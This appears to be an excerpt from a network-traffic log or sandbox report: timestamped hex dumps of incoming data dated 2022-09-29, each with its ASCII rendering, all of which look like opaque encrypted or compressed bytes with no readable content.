                                                                                                                                                2022-09-29 12:50:05 UTC13337INData Raw: 3a 39 af 6d 9d 8b 81 17 64 36 05 b4 50 21 a8 24 86 c5 83 dd ba fd ca 62 88 18 66 e3 e5 d3 5d e2 41 92 65 b8 28 1d 2d 38 13 2b f6 42 14 fa 52 30 59 c8 04 f2 c1 9f ac b8 50 5e d1 46 0c 8a 51 b7 72 d8 07 aa e6 12 66 b1 01 62 8f fc 02 43 c4 f9 c1 c1 0f 67 be 96 99 ac d9 22 77 e6 f3 cf 96 87 4c 9d 56 f3 b1 cf d2 df 37 a4 fe 5a 75 2d 96 59 5a 48 58 f3 0a a2 da 11 80 96 89 47 15 26 98 29 57 0a de d1 f0 2e 82 99 d0 4b cc 09 9a ec ef c5 b7 d3 df 48 7c 8a 45 e0 2d 70 15 b0 15 7b e8 4b 29 dc d4 7f 18 f5 da 3f 99 dd a1 b7 10 0f 76 60 61 aa 8d c0 b4 93 6d 6d b3 bf c9 7b 40 b6 21 d0 03 d8 6e 77 7b 76 bc 65 3a 8d 50 62 b3 c8 31 1f e1 eb a0 f9 97 9d a7 b1 b9 c7 5f 91 59 2f 1c 06 69 bb 2a 17 e4 dd 80 69 23 80 2d 29 03 62 12 d0 a6 82 94 78 02 ca 64 c4 b5 0d d5 88 fa 43 9c
                                                                                                                                                Data Ascii: :9md6P!$bf]Ae(-8+BR0YP^FQrfbCg"wLV7Zu-YZHXG&)W.KH|E-p{K)?v`amm{@!nw{ve:Pb1_Y/i*i#-)bxdC
                                                                                                                                                2022-09-29 12:50:05 UTC13353INData Raw: ca 34 7b 79 fc 0a 98 a6 fc c6 21 6d 0f 4d b5 29 0e f8 80 ab 3d c3 42 25 a5 b2 81 98 63 2b 39 dc 0c 1d 6b 75 3c cf 6e fa 21 39 40 92 8a 74 30 48 05 b4 53 66 b2 80 ee 17 4f f5 de 30 05 e4 c8 e9 ba 2f 3c d6 a1 cc 05 d6 25 48 ff 1b 51 30 9b be 51 82 a6 6e 69 4b c0 82 b7 24 95 18 ba 24 43 47 59 83 48 ed 4b c4 e3 7a 50 14 85 34 c0 27 d2 11 c0 db 37 e8 42 db 8b 4b 02 7b 8d 70 7a 63 f1 67 a3 75 2f 8b b4 4c 65 d2 c9 82 54 a0 79 6c 53 9b e0 4d 39 3a ac e2 5c 97 90 70 ca d2 6a 26 19 a9 09 5f 48 c7 cb 0e c4 9b d2 7d 47 36 eb da 53 4b 1e a9 dc 06 9c 02 56 96 8c 75 e5 a8 ec e5 aa ab 43 43 54 55 07 57 52 64 0d 6c 1a af 82 0e 52 62 e2 99 0d 3e 4f dd 40 55 95 73 64 10 b0 d1 e4 52 c7 c7 a6 f1 2b 24 60 25 0d eb af 69 55 c5 eb 38 9a 99 f6 2e 1b 13 7c f1 98 c7 ba 9e bd 4b 29
                                                                                                                                                Data Ascii: 4{y!mM)=B%c+9ku<n!9@t0HSfO0/<%HQ0QniK$$CGYHKzP4'7BK{pzcgu/LeTylSM9:\pj&_H}G6SKVuCCTUWRdlRb>O@UsdR+$`%iU8.|K)
                                                                                                                                                2022-09-29 12:50:05 UTC13369INData Raw: 2e 92 7d f4 93 92 b4 95 cb b6 cd a3 93 03 02 77 e5 18 a6 db b9 55 e2 63 b6 95 45 55 da ea cf aa e3 4f bf 83 9a a5 c4 0e 95 60 c0 8f 40 77 ca a9 f5 48 f7 73 26 e4 e6 bd bb 54 7b d2 68 2d 74 89 ef d3 9d ff 24 6b d3 66 c2 4b 81 43 c7 e4 be 5e bd a2 ac 5a 8f fa 3c 9d 55 aa 27 76 af 36 b5 15 d0 6c 46 4d 95 bb ba bd 43 68 69 23 d6 f0 19 d5 27 82 b2 5d 5f 7c c5 6e 36 65 0d c6 4d 19 71 1c 9e 69 d3 80 02 78 30 55 fd 74 5d 51 bc e2 76 53 d6 2a cd 8f bb 68 a7 b5 32 15 ba e6 6e ad 70 6f 9d d2 c8 3e 1a bd 49 b7 39 a2 10 f3 d4 2c f6 8b 78 93 a9 e8 0a d4 59 14 b8 e9 4d 5c 74 e0 86 c3 ea b0 44 b0 94 0b 8d 63 31 79 28 d9 07 2d 93 c8 9a c7 37 ef c3 5a 62 25 a0 f7 c2 c9 36 5d 0e 44 64 6f d0 72 2a 87 04 8a 11 6b 61 cd 52 3d ec 63 5f 5f a2 3f c3 17 6b c6 33 b0 8c 5a a9 7a ce
                                                                                                                                                Data Ascii: .}wUcEUO`@wHs&T{h-t$kfKC^Z<U'v6lFMChi#']_|n6eMqix0Ut]QvS*h2npo>I9,xYM\tDc1y(-7Zb%6]Ddor*kaR=c__?k3Zz
                                                                                                                                                2022-09-29 12:50:05 UTC13385INData Raw: aa 69 58 eb bd b0 ce 1a 2b 31 c2 2c 55 cb a5 6e dc 37 71 13 5d a2 9f c3 a2 0e b7 9e dc e5 3f b5 db c4 a0 c4 5b ec 75 91 cc f0 90 04 37 5f d4 a9 ea e9 c4 fe 59 8a ff 9f 73 24 71 9b 0f 89 4b 0b ca 53 9f 68 fe a0 91 ac b9 73 0c a9 dc 20 25 78 11 65 e3 d5 f3 96 cf 83 eb 0e df ec 7a e5 cd 2e 7f 5e e8 64 29 d1 b1 de 4f f4 3b f9 52 0c 59 0d a0 f0 bd fa a9 4a 1b 61 7c 6e c8 fe 4b 80 f5 ba a4 da 14 d6 23 8d 81 1b 4c 64 de b9 04 bc 71 ec ee 16 7c f8 fb 65 5f 49 ea 17 6d 29 a2 84 a1 b2 fa ed 19 b3 0e 5b 62 99 25 58 fb f1 e3 0e d1 e1 d3 a5 d5 88 a2 41 26 aa 7f c3 de 45 2c 71 0f ba 97 20 7b 29 ff 84 bf 0a db 13 0c 1f 9c b2 e8 71 10 50 1a a5 5b d6 36 5f 1e 1d f3 ad e1 43 ae 17 ae 08 f8 e4 57 bb 4c 79 d0 a4 d7 b5 56 a8 d3 c9 9c 01 b8 47 52 7f 7a 4a ec 7a 95 7a 14 53 cd
                                                                                                                                                Data Ascii: iX+1,Un7q]?[u7_Ys$qKShs %xez.^d)O;RYJa|nK#Ldq|e_Im)[b%XA&E,q {)qP[6_CWLyVGRzJzzS
                                                                                                                                                2022-09-29 12:50:05 UTC13401INData Raw: ec fc 00 0e 4c f9 58 54 6a 7c b5 b3 20 41 2e 94 99 03 12 9f ae c1 f9 89 db b6 97 68 44 7a fa 79 b9 68 92 81 1b d2 51 c5 45 db d5 c0 a2 90 55 39 e4 0a e6 5d 56 77 03 db 99 41 1e 26 c9 65 2e d4 cb 0d 79 7c 8a a1 b2 ea 1e f8 05 d9 0b 1c d4 35 a7 2f 1f bf b5 a4 fa 5d 21 a3 38 87 66 76 a9 a5 ae 23 8b 4f 9d a2 00 0d 06 38 c9 f0 87 66 de a9 e7 21 49 44 3c 93 f9 0a 31 1e 88 7e 9d fe f8 f3 ef 08 9d 55 77 c4 6d 38 39 8e 01 11 65 55 61 f4 c8 16 a0 e1 05 13 eb 4a 98 39 2b bb 18 a3 d1 db df db 84 fb d5 a9 c1 e4 de 7e b2 04 a0 ec 4c 05 a4 56 82 40 14 6b c3 93 d3 9b 40 2c 44 03 fc 11 3a e1 18 76 69 be b4 e7 8d 38 61 3d 95 01 39 d8 2b 57 7c 5a 97 da ed 77 6b a1 b1 77 ff 2f 07 e3 fd 27 18 d3 2e 4a d0 62 67 af 0a 12 7b b6 15 88 bd a0 c2 19 b3 5b dc 83 1f 41 bf 7a 93 50 f3
                                                                                                                                                Data Ascii: LXTj| A.hDzyhQEU9]VwA&e.y|5/]!8fv#O8f!ID<1~Uwm89eUaJ9+~LV@k@,D:vi8a=9+W|Zwkw/'.Jbg{[AzP
                                                                                                                                                2022-09-29 12:50:05 UTC13417INData Raw: ac 43 39 ed e2 d6 fe 23 1b 10 25 b2 eb 5e 49 65 28 a1 88 6a 85 7b b5 a9 3b 56 76 a8 d4 27 3b 2a d9 b6 32 84 9a f8 9b 7c d5 ce a1 b6 ea 52 f0 1b 86 4c e4 43 45 4d 9a cb 2f 04 f1 a9 0c 8f f7 76 0f 8e 3e 93 19 6a 3e 83 71 8f bf ab 11 28 48 64 33 ac 82 d8 7b 25 f7 e4 e5 3b 6e 49 41 9d fd bf c9 2a c2 87 70 c1 3e 24 67 dd de 4b 64 71 d2 a5 fb 38 cd 1b 1a 74 95 10 35 ba f2 0c 74 1d 1c 33 88 e6 8f ed 21 e9 69 77 89 43 7d 5c 36 c7 4d aa 4d 33 83 7b a0 0f d3 25 9a 1e f0 5b 6e d9 bf b4 71 1d 46 40 74 6d 35 f7 ff a7 1b 2a ce 84 76 73 b5 16 cb 71 4c 71 75 92 94 d1 3b 42 14 42 eb 23 a0 88 25 2b b4 2f cc 52 a7 bf e7 10 9b f3 c7 c1 77 00 47 c2 26 e8 02 33 c3 ee a0 76 7c 46 a4 20 ca e5 64 b1 7f 98 a5 b4 a3 8a 08 c8 0e ba 4e c5 cb 98 1b 2d 54 9e 61 b1 01 e8 8a 92 8b 7e 07
                                                                                                                                                Data Ascii: C9#%^Ie(j{;Vv';*2|RLCEM/v>j>q(Hd3{%;nIA*p>$gKdq8t5t3!iwC}\6MM3{%[nqF@tm5*vsqLqu;BB#%+/RwG&3v|F dN-Ta~
                                                                                                                                                2022-09-29 12:50:05 UTC13433INData Raw: 10 8c 0e 8e 7d bc 5b 7e 2a 0e fe e6 cf f8 f0 eb 66 20 c8 a3 d5 03 d8 56 a2 a0 f4 91 1e 4e 53 4f 1c b4 9e db 73 6d 3b f9 1e 8a 78 69 13 5b b4 67 0f 58 c0 ab f5 6b 02 c1 65 93 50 42 0c 0b 27 2d 64 6f cb d1 4b 44 4a 65 8d 3a c2 05 d2 b0 31 40 9c 20 29 2b 55 22 d1 61 26 58 7c ef ca 13 52 dc ec 8e 83 03 9a 38 50 42 7b d0 59 6d 25 e4 42 0b e7 c5 33 77 41 60 a2 a2 93 f2 c1 11 ef 24 61 8e 34 32 58 f1 98 44 19 e6 b5 e0 28 c6 90 33 50 83 8c b7 42 76 a8 51 1c f6 24 b6 67 8b 99 ae 79 94 78 4b 47 27 c1 06 8e dc 65 df 9f 07 41 17 bd 2f ec bd e5 04 86 1a 88 11 78 7b fb 55 05 e7 72 56 02 35 63 38 02 98 7d 43 2b c1 ef 5a c0 62 aa 3f 54 cc d3 d2 8e cd fa a8 30 3d a5 0d 28 31 53 93 bb 4f 11 e5 8b e6 c1 1a 02 03 df 65 94 3a 90 37 57 e1 ea 5e 60 10 0d d3 34 3e 20 3e 2b 9e 09
                                                                                                                                                Data Ascii: }[~*f VNSOsm;xi[gXkePB'-doKDJe:1@ )+U"a&X|R8PB{Ym%B3wA`$a42XD(3PBvQ$gyxKG'eA/x{UrV5c8}C+Zb?T0=(1SOe:7W^`4> >+
                                                                                                                                                2022-09-29 12:50:05 UTC13449INData Raw: 79 19 1b 3f e5 c4 dc 5d de 70 a3 2f 29 b7 38 69 3b a2 09 03 b2 d9 05 59 1f f7 fe d3 22 5b fb 11 8f d7 fa 77 59 37 05 7b 70 83 24 6a 74 e9 89 3a 18 da 23 7d d8 f5 db a0 d8 ab 06 59 c9 9f b7 b2 c4 27 b9 94 08 9e 8f 70 fb e5 94 96 00 44 f4 97 ba 2c c1 07 01 05 0e 20 92 df 1e aa 1a 63 be ba df 85 d7 24 99 1b ab 3d 08 c5 5a 2f a6 fc 77 06 a1 21 e0 63 fe 63 29 0e 3e c8 55 bf de 26 d5 37 21 07 37 01 88 d9 83 14 26 b3 a5 cf 60 33 4d 68 f7 f6 16 b2 c7 ac 3d cc f4 68 e0 a7 a5 3c 7c 47 a8 d6 9c 54 ad 50 ff aa 7e 8f bf 07 93 b9 b1 39 a0 d7 54 00 14 f4 fd e1 f0 c1 ad 63 0d 89 e8 02 20 ef 3c f9 90 28 9e bb 5e 58 7a fd 17 cf 57 1e b0 5b 0a 5e 3e 29 99 35 cd 90 a1 7b b9 de 50 02 43 b8 87 38 6a 28 c2 ee 1f c5 5a c2 12 8c 80 3d 18 ca 6b c9 d3 31 fa 36 28 22 de 88 2e 02 60
                                                                                                                                                Data Ascii: y?]p/)8i;Y"[wY7{p$jt:#}Y'pD, c$=Z/w!cc)>U&7!7&`3Mh=h<|GTP~9Tc <(^XzW[^>)5{PC8j(Z=k16(".`
                                                                                                                                                2022-09-29 12:50:05 UTC13465INData Raw: 1d e9 e8 0c c4 13 cf 20 89 e3 cb 92 31 30 6b 48 63 ee a6 4c 0c 4f 0e 8b 83 d8 59 f8 f4 0a e3 ef c5 7b 70 c3 23 12 46 69 a0 87 7b 97 5b 9a 60 71 6b af cc 9c 44 50 29 e6 79 3d 98 ed 95 0d 38 c0 08 68 df f1 80 3a bd 21 37 f0 52 8c ff 92 3b 08 92 5e 61 73 6b 1e 0c 26 0f d0 55 ce 1f 55 0f 37 c4 54 00 8c 4a f0 40 d7 1e 1a 9e 78 86 3b 0d b0 1b 80 35 35 8f a6 6b b4 60 97 a7 c6 80 b7 03 d3 66 b6 69 ad ec 4b de 9c 7f 59 c0 06 e0 a5 f7 f7 95 18 25 69 3b c7 a7 7c ce 08 51 27 0b 16 1c fa f1 ef ba 3d 31 d6 77 90 dc 55 cc 2c 33 b2 cc 5c 28 4d 66 3e cb e6 31 8d ea f7 d2 55 59 e2 3b 12 13 82 94 d8 16 7c 35 5c 19 6c 87 0f 7f 7d 92 35 46 f4 7b df 7d c1 15 9a 11 f5 a5 04 27 b2 96 b7 d6 47 22 fe d2 6e 59 7f 63 af 4e 0d 1f 0d a1 e6 0a b5 23 6d 65 7a 43 60 de ed 98 99 dd 45 96
                                                                                                                                                Data Ascii: 10kHcLOY{p#Fi{[`qkDP)y=8h:!7R;^ask&UU7TJ@x;55k`fiKY%i;|Q'=1wU,3\(Mf>1UY;|5\l}5F{}'G"nYcN#mezC`E
                                                                                                                                                2022-09-29 12:50:05 UTC13481INData Raw: df e8 e6 48 c5 43 c6 6a d8 5e d5 f5 55 63 b4 92 3d fd 31 14 79 08 e5 e1 3f dc b1 23 0c 67 48 a1 f3 5b a1 60 d4 d5 c3 1a 37 01 3e 21 58 db e2 ea 19 69 2b c2 41 a2 ab 94 32 d8 75 cc 36 b1 73 6d 46 3a d2 98 0d fb 37 3e a5 d3 d8 ae 09 2a 36 02 56 9a 0d 0f d9 3f 43 1e a1 dd 00 c1 18 0f 84 af 3c ce f7 e1 78 31 66 b4 57 7b df a1 d6 61 0a db c5 7a 13 fe 0f 05 88 0e 58 ad c6 b5 6e fd 84 5f b8 0b cf 02 3a 47 5b 53 74 23 66 7c 00 3a 84 c4 a2 0d 21 b0 d5 c4 0a 99 93 de 20 b0 14 59 03 b4 5e 5b cd 16 0d 0f 8e d1 c4 03 52 fb 2b 38 95 fc e6 31 26 b9 03 61 21 48 39 94 57 0b d8 4a 5c 0e e2 39 62 fb e5 53 8b 85 91 f8 13 27 07 0b 78 f0 a5 53 23 4d f9 de ef 25 18 4c 85 d7 4f 40 5e 18 7b 82 29 1a 4e 30 c9 90 b7 56 70 c6 a1 02 16 e2 9c b6 1b ee 91 d0 f5 f0 9d 33 d8 c9 94 21 d0
                                                                                                                                                Data Ascii: HCj^Uc=1y?#gH[`7>!Xi+A2u6smF:7>*6V?C<x1fW{azXn_:G[St#f|:! Y^[R+81&a!H9WJ\9bS'xS#M%LO@^{)N0Vp3!
                                                                                                                                                2022-09-29 12:50:05 UTC13497INData Raw: 3c 2d e1 43 4e 6c 88 a8 d6 f5 3d bf be c4 b6 d2 0e eb 94 55 6b 68 78 dc 8d 37 45 71 9f af a8 14 06 8f b1 4c 28 94 c7 8a 53 2d 49 13 dc 70 f1 55 21 f2 36 3d 31 17 b0 21 06 38 83 42 be f5 13 27 99 ea 09 de 50 2c 0f 5d ef e7 5b ff 7e 92 14 a7 79 fd 8c 44 c9 cd 7d 5c 2b 82 ac 29 34 9e 01 dd 13 1e ca 2d 24 9c b6 7d 88 42 b1 7e a6 08 18 c8 8e b8 a9 95 fe 2e d9 9e bb 37 94 d3 e7 f9 40 c8 49 8a 97 fd ac d4 f9 58 f6 61 cd e9 be 5b ee 5f a4 0f 71 a8 82 8e 32 f7 35 3f 12 ad 35 06 5e f4 53 b9 59 dc 8f 1b 0e 36 7f d9 a8 c2 77 ad 40 93 64 21 c7 d3 cd 3b cc be 05 68 ae 7a 62 ef 2c 66 34 70 aa 75 f6 32 1b 72 87 71 d7 1c 09 37 7c bd 20 54 46 2b 4c 8c c4 04 5f f4 ff 25 a3 c1 fd 48 8f cc b6 52 ae 39 22 04 c9 ef 33 a3 9d 37 e3 69 9b af b0 14 cd d6 b6 ad 8c 00 23 c9 9a 83 69
                                                                                                                                                Data Ascii: <-CNl=Ukhx7EqL(S-IpU!6=1!8B'P,][~yD}\+)4-$}B~.7@IXa[_q25?5^SY6w@d!;hzb,f4pu2rq7| TF+L_%HR9"37i#i
                                                                                                                                                2022-09-29 12:50:05 UTC13513INData Raw: 66 4c e8 3b 07 38 f7 46 e1 61 1e 36 99 e4 5a 6f b8 59 1c 56 31 0b ae 63 66 fe 59 bf c3 13 51 16 d5 6f cf 24 e0 5e 78 be e6 74 31 a8 83 94 a9 24 30 53 60 c9 59 eb 2d 68 93 e2 53 3b 44 b8 18 dd 97 91 f1 c4 1d ac 30 01 43 95 2b 38 e6 d4 f4 6f 24 a1 75 dd a3 ab 4a 6f d8 8d d2 74 d1 8e fb cc 75 1a 54 78 9d 05 1e c3 0f db b5 3a b7 33 92 28 f3 5d d3 28 87 ea ed 79 7f 6a f9 f5 5d 1d 99 6f de c1 bd 73 40 34 51 20 04 ff 8f d7 3e 77 cb 25 24 03 c7 44 12 18 f5 a9 7e 41 54 fa cc 70 9b 8c da 92 29 88 03 e8 fa 78 0a bf 0b fa f0 08 5c bc 4d 11 f2 ee d6 0d 28 ad 04 c8 63 c7 d7 dd f5 44 82 1b a2 0c 6d 09 3a 96 51 44 fb 91 d2 b9 42 7b 6d 90 53 4b 0b 83 3a f2 aa bd b6 7f 59 71 6a fa 3f ad 85 54 1f 7a b2 02 0a d3 7e 35 a6 0a 6d bb 98 2a db c5 d2 c5 d2 8b a6 11 e8 91 69 f4 d4
                                                                                                                                                Data Ascii: fL;8Fa6ZoYV1cfYQo$^xt1$0S`Y-hS;D0C+8o$uJotuTx:3(](yj]os@4Q >w%$D~ATp)x\M(cDm:QDB{mSK:Yqj?Tz~5m*i
                                                                                                                                                2022-09-29 12:50:05 UTC13529INData Raw: 2e 86 10 96 f5 60 d2 46 af de 41 f5 6b 87 35 11 16 26 a6 37 1a 7c 0c 5a d3 63 63 b9 e5 a6 de 39 83 84 fe a0 df 8d ea d6 4a b3 49 3d 61 28 fd db b6 3e f0 cc c7 21 a6 69 93 7c d7 13 b1 0f 47 80 f0 39 80 fb 7d a6 23 c4 ea 88 63 eb 8c 3d 39 e1 12 80 7c 04 75 2c a7 e3 88 ee f8 5a 22 88 bf 23 15 a0 4c de f4 f5 f7 c6 90 d5 df b1 ed 5b 95 89 f3 ba 14 34 8e 48 0d 53 a4 37 71 9a bb 60 b3 70 09 8c 0f 33 60 14 2e de 19 c3 10 5d 79 a6 30 3b f4 dd f9 17 c0 65 3c 01 7b 57 9e c9 44 82 83 76 9d da 04 12 92 1d 49 df b1 8a 95 e1 dd d9 91 03 13 2d c2 7e 77 70 0e fc f2 08 a6 bf f9 a3 a3 73 c8 30 19 c7 18 b0 16 b6 ee 55 00 0b 3a 57 d3 4c 41 09 00 a3 f3 ab fa dd e5 7d b0 8c 80 5b 5b 2f c7 f5 83 dd 8f 88 13 22 d6 66 d6 a5 fb eb eb 70 8d ec b7 0e 18 3d 16 1d 8c cb 51 1f 34 2c 6d
                                                                                                                                                Data Ascii: .`FAk5&7|Zcc9JI=a(>!i|G9}#c=9|u,Z"#L[4HS7q`p3`.]y0;e<{WDvI-~wps0U:WLA}[[/"fp=Q4,m
                                                                                                                                                2022-09-29 12:50:05 UTC13545INData Raw: b7 e0 4e 79 57 3a fa 73 46 c1 05 a7 52 e1 3b d4 0f 45 ba a6 37 71 09 e9 9c 11 bb d6 2a d1 a6 0d 98 7d 06 27 42 b3 de 7c ff b1 3e fb bf 22 62 5e 0b 82 5b 64 6f 4b 5f c3 e0 11 cc 80 b1 06 4a dd b9 8f 0c 02 eb 49 d4 28 f0 1e a1 34 33 01 de ad 40 d2 40 ae 79 03 6c a8 ec da a1 f9 53 67 9b 06 70 e9 42 91 f4 b6 02 95 d1 81 57 ce 38 b8 88 4c 4e 7b 99 45 54 1b 3b 68 bb 82 07 2a 0b 03 91 54 af 3d 37 7a a7 da f9 56 2c e8 f6 71 50 f7 ea 68 0e 0a 85 ba 97 de 88 a5 d0 72 15 95 c1 06 4d 13 e0 e9 47 aa c1 5d 03 1f 5b 62 00 eb 3d 87 75 e6 43 a0 1c 53 b0 25 a2 cf 5f e5 9e 1b 08 68 aa 58 a7 1b e3 58 a9 93 52 cf 83 59 50 8b 53 45 a8 44 1d 84 f5 fb ab 66 be 32 f6 48 5b 2b 58 6c 52 b7 87 c1 c5 6b 0a c8 9f 1f 07 52 18 4f 9b 10 8d 52 a6 da dd 0f 32 87 f2 d1 c3 23 b0 79 c5 ac 82
                                                                                                                                                Data Ascii: NyW:sFR;E7q*}'B|>"b^[doK_JI(43@@ylSgpBW8LN{ET;h*T=7zV,qPhrMG][b=uCS%_hXXRYPSEDf2H[+XlRkROR2#y
                                                                                                                                                2022-09-29 12:50:05 UTC13561INData Raw: 6c 25 b8 5f 99 2a 68 4f 63 7e 3d d3 57 a4 e6 f0 09 39 ab 30 d6 2e 86 3e 70 fb 13 85 cb 29 47 3e d4 c7 46 39 de 7a e5 7b 0b a0 ad f5 3f ad 57 4e a4 70 a6 63 cd 77 58 9b 23 e7 b6 c2 97 68 e4 56 26 88 ee e6 9c e5 d2 f7 b4 b4 10 b0 17 99 a8 39 ae 3e 3e 98 a0 30 33 89 10 5c 1f a5 b8 b7 c0 c0 00 93 36 df 9b 49 10 96 e6 a2 87 01 36 b5 7d 29 99 9a 41 6d 6d d4 83 73 1e 0f ad 0c 51 f7 de f4 f9 a5 6f 5c fd 77 da ea 27 21 65 36 c8 a9 8a ac b6 d2 56 a0 f7 67 7d 35 20 c1 87 74 23 0a 89 39 31 36 86 95 a1 0d 12 2e 69 a1 79 cd 84 8b 02 1b 04 53 3f ed 5b 71 72 c6 d6 63 01 df 9c 2a 3f 73 b3 3c 1c 38 23 27 f9 63 cc 37 bb 9f 84 e1 71 6e fe a3 70 61 2c 13 a0 ec 6a 2a b6 16 ff ca 80 52 40 84 53 95 d8 8a ad 83 4d f5 7a 6e 1f f5 a9 08 e3 23 13 b1 1e 71 51 5c 5b 3d 94 b5 8c 70 8f
                                                                                                                                                Data Ascii: l%_*hOc~=W90.>p)G>F9z{?WNpcwX#hV&9>>03\6I6})AmmsQo\w'!e6Vg}5 t#916.iyS?[qrc*?s<8#'c7qnpa,j*R@SMzn#qQ\[=p
                                                                                                                                                2022-09-29 12:50:05 UTC13577INData Raw: 65 f0 f3 fc 40 38 3f 46 1b 6e e2 4f d0 12 f2 10 d1 c6 28 81 cd 27 e1 fc f5 80 13 6c d2 1f 93 66 f2 a7 14 cb 32 7c fb 26 31 8c 95 84 0f 20 c6 00 32 cc c3 42 62 f2 14 f8 6d e3 42 3b 71 d4 5e 2e b1 a8 0c a9 ef d9 11 f3 86 a1 fd d7 1c c8 fd 65 47 74 91 4a 74 c7 1b 0b 68 c4 c9 fe b8 ea cf f7 66 74 fe 4f 7c b4 b0 ad 18 b8 77 3b 44 e9 02 58 b1 29 9f e6 26 79 3c 5d 00 87 56 e5 0f 7a 19 5e 3f a1 e9 8f a3 90 a8 fa a3 54 17 e4 68 c0 69 8b b7 2a 38 c1 27 b2 c9 46 8d f1 d0 f7 65 74 5d d1 79 91 3a f5 d1 f3 32 39 0a 27 63 08 78 28 9f 2c 31 e9 d1 d2 72 e3 29 9a 8a 2b 96 bc 29 a3 e2 d1 4e 06 24 ca eb b9 55 c7 17 a3 60 91 d1 fb 59 cf 99 a1 56 c2 60 d1 c3 53 06 57 ae 58 3b 4c ac 0f ca 38 85 fd 9e 2f cf 53 68 29 0a 6a 2d 6b b3 7a fc 8f 80 19 86 10 4e 07 d9 4d 06 45 56 61 b9
                                                                                                                                                Data Ascii: e@8?FnO('lf2|&1 2BbmB;q^.eGtJthftO|w;DX)&y<]Vz^?Thi*8'Fet]y:29'cx(,1r)+)N$U`YV`SWX;L8/Sh)j-kzNMEVa
                                                                                                                                                2022-09-29 12:50:05 UTC13587INData Raw: c8 de 1b 62 f1 56 f4 d7 43 82 4c e8 81 b6 6d c8 ab 92 8d bb f2 f2 14 60 52 73 9e fd ea 46 c1 d4 79 d8 1b 2f c2 ce c6 9d 71 1b 92 bd 99 62 5a 16 4e 88 95 45 13 4f b6 80 93 50 16 e6 a8 45 8a c2 04 c3 71 30 e2 bd 55 54 d6 35 35 9e 97 1b 0d be 6f c1 66 32 02 4d d5 9b cf 8d 54 91 af d8 ea 46 ec 8a 01 9e 9f 40 f9 fe 00 51 e7 48 30 5f 13 e8 da 1e 86 23 19 86 5a 2e 88 5b c9 07 c9 25 6a 7d fa 92 c4 3c e2 bd 3f 83 6d a0 4d 00 ab 63 3e 19 e4 04 7d 0e 82 88 18 81 93 4c 9d 18 09 8d 1b 42 cc 42 8a 11 66 57 dd 2a fb 02 60 68 a8 9f 5f fc 38 b7 a9 c7 71 d6 90 bc d3 90 dd 44 57 56 c4 79 99 fa 0c ca 96 5d 03 3b 44 d1 cf 5d 1e 61 80 d4 dd a7 a5 19 a7 0d eb 19 f0 bb 0c 55 12 db 89 4f c7 aa 9b 82 d8 73 0e a1 ed 5a 76 d6 14 71 1f 31 0a f8 0d 37 d0 4f 5e a7 b7 86 04 fb 29 13 be
                                                                                                                                                Data Ascii: bVCLm`RsFy/qbZNEOPEq0UT55of2MTF@QH0_#Z.[%j}<?mMc>}LBBfW*`h_8qDWVy];D]aUOsZvq17O^)
                                                                                                                                                2022-09-29 12:50:05 UTC13603INData Raw: 9e d8 c3 94 d6 33 cd 55 ab 34 75 ac 60 3d eb bd 13 05 2a f0 fe 49 fa 4d 41 b9 01 b2 af b6 aa 21 ff a4 f9 83 d6 6e 18 58 ac 68 b5 df 36 db c8 75 94 fa a3 19 05 82 66 fb 7b 29 72 92 60 ab 90 8f 3d 0d d1 3c 46 9c 05 4f 15 49 25 3d fb f1 e0 06 2e 5f d4 4e f4 44 fa 30 da 96 67 48 c7 34 e5 0c de d7 87 64 95 18 cb a9 56 80 25 87 fe 57 49 36 47 f8 19 b4 d3 48 b2 19 89 c1 85 14 18 ae b2 23 b2 19 60 55 5c 90 42 a1 9f 07 35 34 a3 1a 50 66 a6 c3 ba 61 e0 2a a2 2e fc 39 d0 57 c3 5b 6b e8 61 02 7d f5 72 7e 6a 5f 29 2b 20 fb 32 42 c3 01 f0 a2 b4 69 1d ff 74 2c b4 d2 d3 55 7b 22 90 5a 1e 9a e3 f0 35 96 5a b1 bf b9 dd 5f 2d e7 a7 1b 3b f5 ae 33 bd a1 26 c6 19 f2 34 6b a4 9f 09 58 25 0f c5 2a 03 5f 9d 1b ce 5f d7 80 de f1 27 dc 7b ef ac da 3b 35 b7 54 b5 da b2 95 4e b0 e3
                                                                                                                                                Data Ascii: 3U4u`=*IMA!nXh6uf{)r`=<FOI%=._ND0gH4dV%WI6GH#`U\B54Pfa*.9W[ka}r~j_)+ 2Bit,U{"Z5Z_-;3&4kX%*__'{;5TN
                                                                                                                                                2022-09-29 12:50:05 UTC13619INData Raw: 91 07 ef 37 21 6d 94 56 98 24 2d e6 9d 45 ef 53 8a e1 c8 9a da 25 ef 50 02 cf 5b b2 43 d1 14 64 de 6c 64 46 0a 38 a5 8c 73 f3 c4 2c 03 e6 0d 21 17 0e a9 69 2a 68 d4 35 84 e8 be 36 33 d2 6e c4 1b 28 a5 16 92 a7 9c 3c ac e1 b9 a5 bd 0c 54 a8 85 7d a7 93 9b 9e 45 b1 ba 94 f8 52 7f c7 e7 bb c1 22 75 f5 08 86 eb 69 96 41 c6 3e a2 6a 09 96 c7 8f e3 66 c4 e2 4d f0 14 eb 75 dc 55 c7 3d d0 09 14 08 1f 28 f6 1b 21 8e b4 6b 79 23 71 32 31 80 37 a4 10 93 2a 76 5e f0 28 09 37 fe a0 b1 b9 c1 3b 25 d1 3f 61 d3 a2 37 34 1d 89 54 1d e8 5c 66 f8 80 1f 30 e7 26 57 8b fd 8d 04 d5 41 7d f0 ec f3 da f5 49 5f c6 95 2f 3d 8f 8c 72 84 40 0c 10 dc ac 46 59 57 9f 7e c4 e0 ec 98 97 cb 33 ec ea e6 5f ba 5a e2 3b cc b5 2f 63 90 6a ef dd d5 65 2e 72 b0 1d 67 d5 d7 e4 68 8c 14 b2 0e 19
                                                                                                                                                Data Ascii: 7!mV$-ES%P[CdldF8s,!i*h563n(<T}ER"uiA>jfMuU=(!ky#q217*v^(7;%?a74T\f0&WA}I_/=r@FYW~3_Z;/cje.rgh
